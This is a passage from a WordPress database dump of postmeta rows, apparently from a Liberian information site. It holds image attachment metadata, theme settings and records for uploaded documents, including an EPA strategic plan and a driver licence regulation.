8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31799,4526,'_wp_attached_file','2021/12/Workshop-Participants.jpg'),(31800,4526,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1431;s:6:\"height\";i:888;s:4:\"file\";s:33:\"2021/12/Workshop-Participants.jpg\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"Workshop-Participants-300x186.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:186;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"Workshop-Participants-1024x635.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:635;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"Workshop-Participants-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"Workshop-Participants-768x477.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:477;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:33:\"Workshop-Participants-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:32:\"Workshop-Participants-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:33:\"Workshop-Participants-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:33:\"Workshop-Participants-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:33:\"Workshop-Participants-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:33:\"Workshop-Participants-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:34:\"Workshop-Participants-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:33:\"Workshop-Participants-600x372.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:372;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:33:\"Workshop-Participants-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:34:\"Workshop-Participants-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31801,4527,'_wp_attached_file','2021/12/workshop.png'),(31802,4527,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:20:\"2021/12/workshop.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"workshop-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"workshop-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"workshop-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"workshop-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:19:\"workshop-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:20:\"workshop-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:20:\"workshop-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:20:\"workshop-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:20:\"workshop-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:20:\"workshop-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:20:\"workshop-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31805,4524,'_wp_old_date','2021-12-17'),(31806,4524,'_thumbnail_id','4527'),(31807,4524,'_edit_last','42'),(31808,4524,'kava_extra_enable_breadcrumbs','inherit'),(31809,4524,'post_formats',''),(31810,4524,'gallery_tab',''),(31811,4524,'kava_extra_gallery_images',''),(31812,4524,'link_tab',''),(31813,4524,'kava_extra_link',''),(31814,4524,'kava_extra_link_target','_blank'),(31815,4524,'quote_tab',''),(31816,4524,'kava_extra_quote_text',''),(31817,4524,'kava_extra_quote_cite',''),(31818,4524,'audio_tab',''),(31819,4524,'kava_extra_audio',''),(31820,4524,'kava_extra_audio_loop','false'),(31821,4524,'kava_extra_audio_autoplay','false'),(31822,4524,'kava_extra_audio_preload','false'),(31823,4524,'video_tab',''),(31824,4524,'kava_extra_video_type','library'),(31825,4524,'kava_extra_video_library',''),(31826,4524,'kava_extra_video_external',''),(31827,4524,'kava_extra_video_poster',''),(31828,4524,'kava_extra_video_width','770'),(31829,4524,'kava_extra_video_height','480'),(31830,4524,'kava_extra_video_loop','false'),(31831,4524,'kava_extra_video_autoplay','false'),(31832,4524,'kava_extra_video_preload','false'),(31833,4529,'_edit_lock','1639740935:42'),(31834,4529,'_last_editor_used_jetpack','block-editor'),(31835,4530,'_wp_attached_file','2021/12/Speaker-Chambers-Prof-Tarpeh.jpg'),(31836,4530,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1429;s:6:\"height\";i:1098;s:4:\"file\";s:40:\"2021/12/Speaker-Chambers-Prof-Tarpeh.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"Speaker-Chambers-Prof-Tarpeh-300x231.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:231;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:41:\"Speaker-Chambers-Prof-Tarpeh-1024x787.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:787;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"Speaker-Chambers-Prof-Tarpeh-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"Speaker-Chambers-Prof-Tarpeh-768x590.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:590;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:40:\"Speaker-Chambers-Prof-Tarpeh-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:39:\"Speaker-Chambers-Prof-Tarpeh-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:40:\"Speaker-Chambers-Prof-Tarpeh-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:40:\"Speaker-Chambers-Prof-Tarpeh-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:40:\"Speaker-Chambers-Prof-Tarpeh-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:40:\"Speaker-Chambers-Prof-Tarpeh-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:41:\"Speaker-Chambers-Prof-Tarpeh-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"kava-thumb-xl\";a:4:{s:4:\"file\";s:42:\"Speaker-Chambers-Prof-Tarpeh-1429x1080.jpg\";s:5:\"width\";i:1429;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:40:\"Speaker-Chambers-Prof-Tarpeh-600x461.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:461;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:40:\"Speaker-Chambers-Prof-Tarpeh-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:41:\"Speaker-Chambers-Prof-Tarpeh-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31837,4531,'_wp_attached_file','2021/12/Dr-Chambers.jpg'),(31838,4531,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:916;s:6:\"height\";i:864;s:4:\"file\";s:23:\"2021/12/Dr-Chambers.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Dr-Chambers-300x283.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Dr-Chambers-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"Dr-Chambers-768x724.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"Dr-Chambers-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:22:\"Dr-Chambers-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:23:\"Dr-Chambers-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:23:\"Dr-Chambers-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:23:\"Dr-Chambers-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:23:\"Dr-Chambers-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:23:\"Dr-Chambers-916x650.jpg\";s:5:\"width\";i:916;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:23:\"Dr-Chambers-600x566.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:566;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:23:\"Dr-Chambers-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:23:\"Dr-Chambers-916x640.jpg\";s:5:\"width\";i:916;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31841,4529,'_wp_old_date','2021-12-17'),(31842,4529,'_edit_last','42'),(31843,4529,'kava_extra_enable_breadcrumbs','inherit'),(31844,4529,'post_formats',''),(31845,4529,'gallery_tab',''),(31846,4529,'kava_extra_gallery_images',''),(31847,4529,'link_tab',''),(31848,4529,'kava_extra_link',''),(31849,4529,'kava_extra_link_target','_blank'),(31850,4529,'quote_tab',''),(31851,4529,'kava_extra_quote_text',''),(31852,4529,'kava_extra_quote_cite',''),(31853,4529,'audio_tab',''),(31854,4529,'kava_extra_audio',''),(31855,4529,'kava_extra_audio_loop','false'),(31856,4529,'kava_extra_audio_autoplay','false'),(31857,4529,'kava_extra_audio_preload','false'),(31858,4529,'video_tab',''),(31859,4529,'kava_extra_video_type','library'),(31860,4529,'kava_extra_video_library',''),(31861,4529,'kava_extra_video_external',''),(31862,4529,'kava_extra_video_poster',''),(31863,4529,'kava_extra_video_width','770'),(31864,4529,'kava_extra_video_height','480'),(31865,4529,'kava_extra_video_loop','false'),(31866,4529,'kava_extra_video_autoplay','false'),(31867,4529,'kava_extra_video_preload','false'),(31868,4534,'_wp_attached_file','2021/12/NAP-Launch.jpg'),(31869,4534,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:22:\"2021/12/NAP-Launch.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"NAP-Launch-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"NAP-Launch-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"NAP-Launch-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"NAP-Launch-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"NAP-Launch-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:22:\"NAP-Launch-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:22:\"NAP-Launch-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:22:\"NAP-Launch-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:22:\"NAP-Launch-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:22:\"NAP-Launch-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:22:\"NAP-Launch-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1638956450\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(31872,4529,'_thumbnail_id','4534'),(31878,4537,'_wp_attached_file','2022/01/Screenshot-60.png'),(31879,4537,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:25:\"2022/01/Screenshot-60.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Screenshot-60-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Screenshot-60-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"Screenshot-60-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:24:\"Screenshot-60-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:25:\"Screenshot-60-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:25:\"Screenshot-60-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:25:\"Screenshot-60-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31880,4538,'_wp_attached_file','2022/01/2022-2026-EPA-Strategic-Plan.pdf'),(31885,2989,'_last_editor_used_jetpack','classic-editor'),(31886,2989,'_wp_page_template','default'),(31890,4542,'_last_editor_used_jetpack','classic-editor'),(31891,4542,'_edit_lock','1641478880:42'),(31892,4542,'_edit_last','42'),(31893,4542,'_wp_page_template','default'),(31894,4542,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/01/2022-2026-EPA-Strategic-Plan.pdf'),(31895,4542,'by','EPA'),(31896,4542,'year','2021'),(31897,4542,'_pods_document_cover_image','a:1:{i:0;i:4537;}'),(31898,4542,'document_cover_image','4537'),(31899,4542,'_pods_attached_document','a:1:{i:0;i:4538;}'),(31900,4542,'attached_document','4538'),(31901,4546,'_last_editor_used_jetpack','classic-editor'),(31902,4546,'_edit_lock','1642075874:42'),(31903,4546,'_edit_last','42'),(31904,4547,'_wp_attached_file','2022/01/Screenshot-62.png'),(31905,4547,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:25:\"2022/01/Screenshot-62.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Screenshot-62-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Screenshot-62-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"Screenshot-62-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:24:\"Screenshot-62-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:25:\"Screenshot-62-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:25:\"Screenshot-62-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:25:\"Screenshot-62-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31906,4548,'_wp_attached_file','2022/01/DRIVER-LICENSE-REGULATION.pdf'),(31907,4546,'_wp_page_template','default'),(31908,4546,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/01/DRIVER-LICENSE-REGULATION.pdf'),(31909,4546,'by','MOT'),(31910,4546,'year','2022'),(31911,4546,'_pods_document_cover_image','a:1:{i:0;i:4547;}'),(31912,4546,'document_cover_image','4547'),(31913,4546,'_pods_attached_document','a:1:{i:0;i:4548;}'),(31914,4546,'attached_document','4548'),(31915,4551,'_edit_lock','1642076404:42'),(31916,4551,'_last_editor_used_jetpack','block-editor'),(31917,4552,'_wp_attached_file','2022/01/gender-news-.png'),(31918,4552,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:24:\"2022/01/gender-news-.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"gender-news--300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"gender-news--150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"gender-news--768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"gender-news--370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:23:\"gender-news--150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:24:\"gender-news--230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:24:\"gender-news--400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:24:\"gender-news--370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:24:\"gender-news--570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:24:\"gender-news--600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:24:\"gender-news--640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31919,4551,'_thumbnail_id','4552'),(31920,4551,'_edit_last','42'),(31921,4551,'kava_extra_enable_breadcrumbs','inherit'),(31922,4551,'post_formats',''),(31923,4551,'gallery_tab',''),(31924,4551,'kava_extra_gallery_images',''),(31925,4551,'link_tab',''),(31926,4551,'kava_extra_link',''),(31927,4551,'kava_extra_link_target','_blank'),(31928,4551,'quote_tab',''),(31929,4551,'kava_extra_quote_text',''),(31930,4551,'kava_extra_quote_cite',''),(31931,4551,'audio_tab',''),(31932,4551,'kava_extra_audio',''),(31933,4551,'kava_extra_audio_loop','false'),(31934,4